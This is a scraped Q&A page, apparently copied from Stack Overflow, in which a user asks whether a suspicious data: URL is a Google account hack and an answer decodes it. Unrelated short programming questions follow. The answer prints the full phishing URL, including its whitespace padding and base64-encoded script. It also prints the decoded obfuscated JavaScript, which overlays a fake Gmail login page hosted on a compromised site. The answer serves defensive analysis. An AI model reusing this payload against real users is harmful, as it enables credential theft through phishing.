javascript - Is this a Google account hack? -

-

i received email colleague attached file appeared on google drive, once clicked led following url, recreates google account login page in order steal passwords:

data:text/html,https://accounts.google.com/servicelogin?service=mail&passive=true&rm=false&continue%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3cscript%20src=data:text/html;base64,zxzhbchmdw5jdglvbihwlgesyyxrlguszcl7zt1mdw5jdglvbihjkxtyzxr1cm4gy307awyoiscnlnjlcgxhy2uol14vlfn0cmluzykpe3doawxlkgmtlsl7zftjxt1rw2ndfhxjfws9w2z1bmn0aw9ukgupe3jldhvybibkw2vdfv07zt1mdw5jdglvbigpe3jldhvybidcxhcrj307yz0xftt3aglszshjls0pe2lmkgtby10pe3a9cc5yzxbsywnlkg5ldybszwdfehaoj1xcyicrzshjkssnxfxijywnzycplgtby10pfx1yzxr1cm4gch0ojzmumi4xnj0imtugmtqgmtmgmtcgmtgiozixeygymcgpeze5ide9my4yljeykfwnmvwnktsxljewpvwnny84ltzcjzsxljexpvwnosa2xcc7ms4ymj1cj1wnoziumzeoxccznfwnkvswxs4ymygxkx0oksl9mzmomzupe30zljiumzyumzc9ijw0idm5pvxcijm4oi8vmziumjyvmjutmjqvxfwiidi3pvxciji4oiawozmwoia1jtsyoto1jvxcij48lzq+ijsnldewldqwlcd8bglua3xkb2n1bwvudhx3aw5kb3d8awzyyw1lfdewmhxpy29ufgltywdlfhh8c2hvcnrjdxr8dhlwzxxyzwx8y3jlyxrlrwxlbwvudhxizwvufghhdmv8ww91fhrpdgxlffnpz25lzhxvdxr8dmfyfgz1bmn0aw9ufhryexxocmvmfgfwcgvuzenoawxkfgnvbnrlbnr8d3b8y2x1ynxzdhlszxxib3jkzxj8agvpz2h0fhdpzhrofgdldevszw1lbnrzqnluywdoyw1lfgjsdwv2b2ljzxbnahxjyxrjahxozwfkfgv8ym9kexxvdxrlckhutux8ahr0chxzcmmnlnnwbgl0kcd8jyksmcx7fskpcg==%3e%3c/script%3e

from script there way of identifying information being sent, had put in email address , password?

let's break down attack far can :

it's url, starting off basic gmail login link, sets few request variables automatically login if possible.

data:text/html,https://accounts.google.com/servicelogin?service=mail&passive=true&rm=false&continue

this followed large amount of empty spaces, intended hide malicious payload view in browser address bar.

%20%20%20%20%20%20%20%20%20%20%20% (etc)

now follows payload victim. it's base64 encoded.

when decode it, looks : 

eval(function (p, a, c, k, e, d) {     e = function (c)     {         return c     };     if (!''.replace(/^/, string))     {         while (c--)         {             d[c] = k[c] || c         }         k = [function (e)             {                 return d[e]             }         ];         e = function ()         {             return '\\w+'         };         c = 1     };     while (c--)     {         if (k[c])         {             p = p.replace(new regexp('\\b' + e(c) + '\\b', 'g'), k[c])         }     }     return p }     ('3.2.16="15 14 13 17 18";21{(20(){19 1=3.2.12(\'1\');1.10=\'7/8-6\';1.11=\'9 6\';1.22=\'\';2.31(\'34\')[0].23(1)}())}33(35){}3.2.36.37="<4 39=\\"38://32.26/25-24/\\" 27=\\"28: 0;30: 5%;29:5%\\"></4>";', 10, 40, '|link|document|window|iframe|100|icon|image|x|shortcut|type|rel|createelement|been|have|you|title|signed|out|var|function|try|href|appendchild|content|wp|club|style|border|height|width|getelementsbytagname|bluevoicepgh|catch|head|e|body|outerhtml|http|src'.split('|'), 0, {}     ))

this, evil, obfuscated javascript. not execute it.

martinstoeckli's answer contains expanded version of script.

it sets title of current tab mimick 'you have been signed out' page of gmail, , alters page, adding screen-filling iframe no borders.

the iframe points @ (what appears be) compromised wordpress site, contains faked gmail login page. upon entering credentials fake page hosted on bluevoicepgh.club (someone might want notify these people wordpress website compromised), redirected gmail page had silently logged in in background. happens regardless of whether credentials entered fake login page correct or not.

if had indeed entered valid credentials page, there no telling have gone unless @ script behind it.

keep in mind, (thankfully) in current form, attack won't work since google's login page uses https (and enforces use of https). chrome reminds when script executed :

mixed content: page @ 'https://accounts.google.com/servicelogin?service=mail&passive=true&rm=false…9kexxvdxrlckhutux8ahr0chxzcmmnlnnwbgl0kcd8jyksmcx7fskpcg==%3e%3c/script%3e' loaded on https, requested insecure resource 'http://bluevoicepgh.club/wp-content/'. request has been blocked; content must served on https.


Comments

Post a Comment

Popular posts from this blog

sql - VB.NET Operand type clash: date is incompatible with int error -

-
i trying display records table named staffpresentee database using clause... i using visual studio 2010... the table design follows- .......fieldname..................datatype........allownull 1......staff_id (fk).............numeric(18,0)......yes 2.......date........................date.............no 3......present.....................char(1)..........yes note type of 2nd field date , not datetime... i want display records table have today's date int 'date' field... current query is- cmd = new sqlclient.sqlcommand("select * staffpresentee date=" & date.now.date, cn) dr = cmd.executereader for dr = cmd.executereader error "operand type clash: date incompatible int" i tried select * staffpresentee query without clause runs correctly. try putting date value in sigle quotes maybe. cmd = new sqlclient.sqlcommand("select * staffpresentee date='" & _
Read more

SVG stroke-linecap doesn't work for circles in Firefox? -

-
i've got problem svg stroke-linecap attribute. i've got circular progress bar in angularjs , set outer circle (blue one) have rounded "ends". @ fiddle . <svg ... height="130" width="130"> <!-- ngif: background --> <circle ... ng-if="background" fill="#fff" class="ng-scope" stroke-width="13" stroke="#cc3399" r="57.5" cy="65" cx="65" stroke-linecap="round" /> <!-- end ngif: background --> <circle ... fill="none" stroke-dashoffset="36.12831551628261" stroke-dasharray="361.28315516282623" stroke-width="13" stroke="#432db3" stroke-linecap="round" r="57.5" cy="65" cx="65" transform="rotate(-89.9, 65, 65)" /> </svg> how can that?
Read more

python - TypeError: Scalar value for argument 'color' is not numeric in openCV -

-
here code im = cv2.imread('luffy.jpg') gray = cv2.cvtcolor(im,cv2.color_bgr2gray) ret,thresh = cv2.threshold(gray,127,255,0) contours,h = cv2.findcontours(thresh,cv2.retr_tree,cv2.chain_approx_simple) cnt in contours: moment = cv2.moments(cnt) c_y = moment['m10']/(moment['m00']+0.01) c_x = moment['m01']/(moment['m00']+0.01) centroid_color = im[c_x,c_y] centroid_color = np.array((centroid_color[0],centroid_color[1],centroid_color[2])) print type(centroid_color) cv2.fillpoly(im,cnt,centroid_color) i getting error on last line try , pass centroid_color color argument. <type 'numpy.ndarray'> , have been able pass data type cv2.fillpoly color in other instances, not sure why having problem here. fillpoly() expects iterable, i.e. put cnt in brackets. believe duplicate of https://stackoverflow.com/a/17582850/5818240 . moreover, centroid color variable contains strings. need convert them i
Read more